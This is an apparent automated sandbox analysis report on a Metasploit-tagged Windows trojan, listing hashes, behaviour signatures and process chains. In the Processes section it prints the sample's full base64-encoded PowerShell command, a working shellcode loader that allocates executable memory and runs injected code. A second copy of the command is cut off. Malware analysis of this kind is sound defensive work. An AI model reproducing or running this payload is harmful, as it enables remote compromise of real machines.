Malware Analysis Report

2024-09-23 03:50

Sample ID 240527-24dy4sdd91
Target 6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517
SHA256 6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517
Tags
metasploit backdoor execution trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517

Threat Level: Known bad

The file 6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517 was found to be: Known bad.

Malicious Activity Summary

metasploit backdoor execution trojan

MetaSploit

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-27 23:07

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 23:07

Reported

2024-05-27 23:10

Platform

win7-20231129-en

Max time kernel

149s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe"

Signatures

MetaSploit

trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2392 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2392 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2392 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3048 wrote to memory of 2584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3048 wrote to memory of 2584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3048 wrote to memory of 2584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3048 wrote to memory of 2584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2584 wrote to memory of 2592 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2584 wrote to memory of 2592 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2584 wrote to memory of 2592 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2584 wrote to memory of 2592 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2592 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2592 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2592 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2592 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe

"C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABBADIAVgAgAD0AIAAnACQAUAB5AHgAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUAB5AHgAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADEAOQAsADAAeABhAGIALAAwAHgAYQA4ACwAMAB4AGEAYwAsADAAeABkADkALAAwAHgAZQBlACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADgAMwAsADAAeABmADMALAAwAHgANQA3ACwAMAB4ADQAYQAsADAAeAA1ADkALAAwAHgAZgBmACwAMAB4ADQAMAAsADAAeAAwADQALAAwAHgAYQAyACwAMAB4AGYAZgAsADAAeAA5ADAALAAwAHgANwBiACwAMAB4ADkAMgAsADAAeAAyAGQALAAwAHgAZgA0ACwAMAB4AGYAMAAsADAAeAA4ADYALAAwAHgAZQAxACwAMAB4ADcAYwAsADAAeABlADMALAAwAHgAYQBjACwAMAB4ADUAMwAsADAAeAA3ADMALAAwAHgANgA3ACwAMAB4AGUAMAAsADAAeAA0ADcALAAwAHgAMAAwACwAMAB4ADAANQAsADAAeAAyAGQALAAwAHgANQA2ACwAMAB4AGUAOQAsADAAeABlADUALAAwAHgAOQBhACwAMAB4AGQAMgAsADAAeAAzADMALAAwAHgAYwBiACwAMAB4ADIANAAsADAAeAA0AGUALAAwAHgAMAA3ACwAMAB4ADQAYQAsADAAeABkADkALAAwAHgAOABjACwAMAB4ADUANAAsADAAeABhAGMALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeABhADkALAAwAHgAYQBkACwAMAB4ADIANQAsADAAeAAxADYALAAwAHgAYwA3ACwAMAB4ADQAMgAsADAAeABmAGIALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjAGYALAAwAHgAZQBjACwAMAB4ADcANAAsADAAeABmADAALAAwAHgAZAAzACwAMAB4ADAAZAAsADAAeAA1AGEALAAwAHgANwBlACwAMAB4ADYAYgAsADAAeAA3ADYALAAwAHgAZABmACwAMAB4ADQAMQAsADAAeAAxADgALAAwAHgAYwBhACwAMAB4AGQAZQAsADAAeAA5ADEALAAwAHgAYgAxACwAMAB4ADUAOQAsADAAeABhADgALAAwAHgAMAA5ACwAMAB4AGIAOQAsADAAeAAwADYALAAwAHgAMAA4ACwAMAB4ADIAYgAsADAAeAA2AGUALAAwAHgAMwAzACwAMAB4ADgAMQAsADAAeAA1AGYALAAwAHgAYQBjACwAMAB4ADAAZAAsADAAeABlAGUALAAwAHgAZQA5ACwAMAB4ADQANwAsADAAeAA1ADkALAAwAHgAOQBiACwAMAB4AGUAYgAsADAAeAA4ADEALAAwAHgAOQAzACwAMAB4ADUAYgAsADAAeAAyAGEALAAwAHgAZQAyACwAMAB4AGQAOQAsADAAeABmADcALAAwAHgAYQBjACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAZQA3ACwAMAB4AGQAYQAsADAAeAAzADAALAAwAHgAMQA5ACwAMAB4ADkAYQAsADAAeABkAGMALAAwAHgAOAAyACwAMAB4ADYAMwAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADEANQAsADAAeABjADMALAAwAHgAMAAzACwAMAB4AGMAYQAsADAAeABmADEALAAwAHgAZgA1ACwAMAB4AGMAMAAsADAAeAA4AGQALAAwAHgANwAyACwAMAB4AGYAOQAsADAAeABhAGQALAAwAHgAZABhACwAMAB4AGQAZAAsADAAeAAxAGUALAAwAHgAMwAwACwAMAB4ADAAZQAsADAAeAA1ADYALAAwAHgAMQBhACwAMAB4AGIAOQAsADAAeABiADEALAAwAHgAYgA5ACwAMAB4AGEAYQAsADAAeABmADkALAAwAHgAOQA1ACwAMAB4ADEAZAAsADAAeABmADYALAAwAHgANQBhACwAMAB4AGIANwAsADAAeAAwADQALAAwAHgANQAyACwAMAB4ADAAZAAsADAAeABjADgALAAwAHgANQA3ACwAMAB4ADMAYQAsADAAeABmADIALAAwAHgANgBjACwAMAB4ADEAMwAsADAAeABhADkALAAwAHgAZQA1ACwAMAB4ADEAMQAsADAAeABkAGMALAAwAHgAMwAxACwAMAB4ADAAYQAsADAAeAA0AGMALAAwAHgANABiACwAMAB4AGYAZAAsADAAeABjADYALAAwAHgANgBmACwAMAB4ADgAYgAsADAAeAA2ADkALAAwAHgANQAxACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAMwA2ACwAMAB4AGMAOQAsADAAeAA4AGIALAAwAHgAZgAxACwAMAB4AGIAZgAsADAAeABkADcALAAwAHgANABjACwAMAB4ADgAMwAsADAAeABhADgALAAwAHgAZQA4ACwAMAB4ADgAMwAsADAAeAAyAGIALAAwAHgAYgA4ACwAMAB4ADEANwAsADAAeAAyADQALAAwAHgANABjACwAMAB4ADkAMAAsADAAeABkADMALAAwAHgANwAwACwAMAB4ADEAYwAsADAAeAA4AGEALAAwAHgAZgAyACwAMAB4AGYAOAAsADAAeABmADcALAAwAHgANABhACwAMAB4AGYAYgAsADAAeAAyAGMALAAwAHgANgBkACwAMAB4ADQAMQAsADAAeAA2AGIALAAwAHgAMABmACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgAZQBhACwAMAB4AGUANwAsADAAeAAxADkALAAwAHgAMABhACwAMAB4AGUAOAAsADAAeABhADAALAAwAHgAOQA0ACwAMAB4AGUAYwAsADAAeABhADAALAAwAHgAMQBlACwAMAB4AGYANwAsADAAeABhADAALAAwAHgAMAAwACwAMAB4AGMAZgAsADAAeABiADcALAAwAHgAMQAwACwAMAB4AGUAOAAsADAAeAAwADUALAAwAHgAMwA4ACwAMAB4ADQAZQAsADAAeAAwADgALAAwAHgAMgA2ACwAMAB4ADkAMgAsADAAeABlADcALAAwAHgAYQAyACwAMAB4AGMAOQAsADAAeAA0AGIALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA3ADMALAAwAHgAZAA2ACwAMAB4ADIAYgAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA1ADEALAAwAHgAMwBiACwAMAB4AGYANgAsADAAeABlADMALAAwAHgAYQA2ACwAMAB4AGYANQAsADAAeABmAGYALAAwAHgAOABlACwAMAB4AGIANAAsADAAeAA2ADEALAAwAHgAZgAwACwAMAB4AGMANAAsADAAeABlADcALAAwAHgAMgA3ACwAMAB4ADAAZgAsADAAeABmADMALAAwAHgAOAAyACwAMAB4AGMANwAsADAAeAA4ADUALAAwAHgAZgA4ACwAMAB4ADAANAAsADAAeAA5ADAALAAwAHgAMwAxACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAZAA2ACwAMAB4ADkAZAAsADAAeABmAGMALAAwAHgANQA3ACwAMAB4ADYAZAAsADAAeAAxADcALAAwAHgANgA5ACwAMAB4ADEAOAAsADAAeAAxADkALAAwAHgANQA4ACwAMAB4ADcAZAAsADAAeAA5ADgALAAwAHgAZAA5ACwAMAB4ADAAZQAsADAAeAAxADcALAAwAHgAOQA4ACwAMAB4AGIAMQAsADAAeABmADYALAAwAHgANAAzACwAMAB4AGMAYgAsADAAeABhADQALAAwAHgAZgA4ACwAMAB4ADUAOQAsADAAeAA3AGYALAAwAHgANwA1ACwAMAB4ADYAZAAsADAAeAA2ADIALAAwAHgAZAA2ACwAMAB4ADIAYQAsADAAeAAyADYALAAwAHgAMABhACwAMAB4AGQANAAsADAAeAAxADUALAAwAHgAMAAwACwAMAB4ADkANQAsADAAeAAyADcALAAwAHgANwAwACwAMAB4ADkAMAAsADAAeABlADkALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABlADYALAAwAHgAMAAzACwAMAB4AGMAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAZABPAEgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGQATwBIAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABkAE8ASAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEEAMgBWACkAKQA7ACQASQA5AE0AOQAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGsAdABjAFUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawB0AGMAVQAgACQASQA5AE0AOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABJADkATQA5ACAAJABlACIAOwB9AA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABBADIAVgAgAD0AIAAnACQAUAB5AHgAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUAB5AHgAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADEAOQAsADAAeABhAGIALAAwAHgAYQA4ACwAMAB4AGEAYwAsADAAeABkADkALAAwAHgAZQBlACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADgAMwAsADAAeABmADMALAAwAHgANQA3ACwAMAB4ADQAYQAsADAAeAA1ADkALAAwAHgAZgBmACwAMAB4ADQAMAAsADAAeAAwADQALAAwAHgAYQAyACwAMAB4AGYAZgAsADAAeAA5ADAALAAwAHgANwBiACwAMAB4ADkAMgAsADAAeAAyAGQALAAwAHgAZgA0ACwAMAB4AGYAMAAsADAAeAA4ADYALAAwAHgAZQAxACwAMAB4ADcAYwAsADAAeABlADMALAAwAHgAYQBjACwAMAB4ADUAMwAsADAAeAA3ADMALAAwAHgANgA3ACwAMAB4AGUAMAAsADAAeAA0ADcALAAwAHgAMAAwACwAMAB4ADAANQAsADAAeAAyAGQALAAwAHgANQA2ACwAMAB4AGUAOQAsADAAeABlADUALAAwAHgAOQBhACwAMAB4AGQAMgAsADAAeAAzADMALAAwAHgAYwBiACwAMAB4ADIANAAsADAAeAA0AGUALAAwAHgAMAA3ACwAMAB4ADQAYQAsADAAeABkADkALAAwAHgAOABjACwAMAB4ADUANAAsADAAeABhAGMALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeABhADkALAAwAHgAYQBkACwAMAB4ADIANQAsADAAeAAxADYALAAwAHgAYwA3ACwAMAB4ADQAMgAsADAAeABmAGIALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjAGYALAAwAHgAZQBjACwAMAB4ADcANAAsADAAeABmADAALAAwAHgAZAAzACwAMAB4ADAAZAAsADAAeAA1AGEALAAwAHgANwBlACwAMAB4ADYAYgAsADAAeAA3ADYALAAwAHgAZABmACwAMAB4ADQAMQAsADAAeAAxADgALAAwAHgAYwBhACwAMAB4AGQAZQAsADAAeAA5ADEALAAwAHgAYgAxACwAMAB4ADUAOQAsADAAeABhADgALAAwAHgAMAA5ACwAMAB4AGIAOQAsADAAeAAwADYALAAwAHgAMAA4ACwAMAB4ADIAYgAsADAAeAA2AGUALAAwAHgAMwAzACwAMAB4ADgAMQAsADAAeAA1AGYALAAwAHgAYQBjACwAMAB4ADAAZAAsADAAeABlAGUALAAwAHgAZQA5ACwAMAB4ADQANwAsADAAeAA1ADkALAAwAHgAOQBiACwAMAB4AGUAYgAsADAAeAA4ADEALAAwAHgAOQAzACwAMAB4ADUAYgAsADAAeAAyAGEALAAwAHgAZQAyACwAMAB4AGQAOQAsADAAeABmADcALAAwAHgAYQBjACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAZQA3ACwAMAB4AGQAYQAsADAAeAAzADAALAAwAHgAMQA5ACwAMAB4ADkAYQAsADAAeABkAGMALAAwAHgAOAAyACwAMAB4ADYAMwAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADEANQAsADAAeABjADMALAAwAHgAMAAzACwAMAB4AGMAYQAsADAAeABmADEALAAwAHgAZgA1ACwAMAB4AGMAMAAsADAAeAA4AGQALAAwAHgANwAyACwAMAB4AGYAOQAsADAAeABhAGQALAAwAHgAZABhACwAMAB4AGQAZAAsADAAeAAxAGUALAAwAHgAMwAwACwAMAB4ADAAZQAsADAAeAA1ADYALAAwAHgAMQBhACwAMAB4AGIAOQAsADAAeABiADEALAAwAHgAYgA5ACwAMAB4AGEAYQAsADAAeABmADkALAAwAHgAOQA1ACwAMAB4ADEAZAAsADAAeABmADYALAAwAHgANQBhACwAMAB4AGIANwAsADAAeAAwADQALAAwAHgANQAyACwAMAB4ADAAZAAsADAAeABjADgALAAwAHgANQA3ACwAMAB4ADMAYQAsADAAeABmADIALAAwAHgANgBjACwAMAB4ADEAMwAsADAAeABhADkALAAwAHgAZQA1ACwAMAB4ADEAMQAsADAAeABkAGMALAAwAHgAMwAxACwAMAB4ADAAYQAsADAAeAA0AGMALAAwAHgANABiACwAMAB4AGYAZAAsADAAeABjADYALAAwAHgANgBmACwAMAB4ADgAYgAsADAAeAA2ADkALAAwAHgANQAxACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAMwA2ACwAMAB4AGMAOQAsADAAeAA4AGIALAAwAHgAZgAxACwAMAB4AGIAZgAsADAAeABkADcALAAwAHgANABjACwAMAB4ADgAMwAsADAAeABhADgALAAwAHgAZQA4ACwAMAB4ADgAMwAsADAAeAAyAGIALAAwAHgAYgA4ACwAMAB4ADEANwAsADAAeAAyADQALAAwAHgANABjACwAMAB4ADkAMAAsADAAeABkADMALAAwAHgANwAwACwAMAB4ADEAYwAsADAAeAA4AGEALAAwAHgAZgAyACwAMAB4AGYAOAAsADAAeABmADcALAAwAHgANABhACwAMAB4AGYAYgAsADAAeAAyAGMALAAwAHgANgBkACwAMAB4ADQAMQAsADAAeAA2AGIALAAwAHgAMABmACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgAZQBhACwAMAB4AGUANwAsADAAeAAxADkALAAwAHgAMABhACwAMAB4AGUAOAAsADAAeABhADAALAAwAHgAOQA0ACwAMAB4AGUAYwAsADAAeABhADAALAAwAHgAMQBlACwAMAB4AGYANwAsADAAeABhADAALAAwAHgAMAAwACwAMAB4AGMAZgAsADAAeABiADcALAAwAHgAMQAwACwAMAB4AGUAOAAsADAAeAAwADUALAAwAHgAMwA4ACwAMAB4ADQAZQAsADAAeAAwADgALAAwAHgAMgA2ACwAMAB4ADkAMgAsADAAeABlADcALAAwAHgAYQAyACwAMAB4AGMAOQAsADAAeAA0AGIALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA3ADMALAAwAHgAZAA2ACwAMAB4ADIAYgAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA1ADEALAAwAHgAMwBiACwAMAB4AGYANgAsADAAeABlADMALAAwAHgAYQA2ACwAMAB4AGYANQAsADAAeABmAGYALAAwAHgAOABlACwAMAB4AGIANAAsADAAeAA2ADEALAAwAHgAZgAwACwAMAB4AGMANAAsADAAeABlADcALAAwAHgAMgA3ACwAMAB4ADAAZgAsADAAeABmADMALAAwAHgAOAAyACwAMAB4AGMANwAsADAAeAA4ADUALAAwAHgAZgA4ACwAMAB4ADAANAAsADAAeAA5ADAALAAwAHgAMwAxACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAZAA2ACwAMAB4ADkAZAAsADAAeABmAGMALAAwAHgANQA3ACwAMAB4ADYAZAAsADAAeAAxADcALAAwAHgANgA5ACwAMAB4ADEAOAAsADAAeAAxADkALAAwAHgANQA4ACwAMAB4ADcAZAAsADAAeAA5ADgALAAwAHgAZAA5ACwAMAB4ADAAZQAsADAAeAAxADcALAAwAHgAOQA4ACwAMAB4AGIAMQAsADAAeABmADYALAAwAHgANAAzACwAMAB4AGMAYgAsADAAeABhADQALAAwAHgAZgA4ACwAMAB4ADUAOQAsADAAeAA3AGYALAAwAHgANwA1ACwAMAB4ADYAZAAsADAAeAA2ADIALAAwAHgAZAA2ACwAMAB4ADIAYQAsADAAeAAyADYALAAwAHgAMABhACwAMAB4AGQANAAsADAAeAAxADUALAAwAHgAMAAwACwAMAB4ADkANQAsADAAeAAyADcALAAwAHgANwAwACwAMAB4ADkAMAAsADAAeABlADkALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABlADYALAAwAHgAMAAzACwAMAB4AGMAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAZABPAEgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMA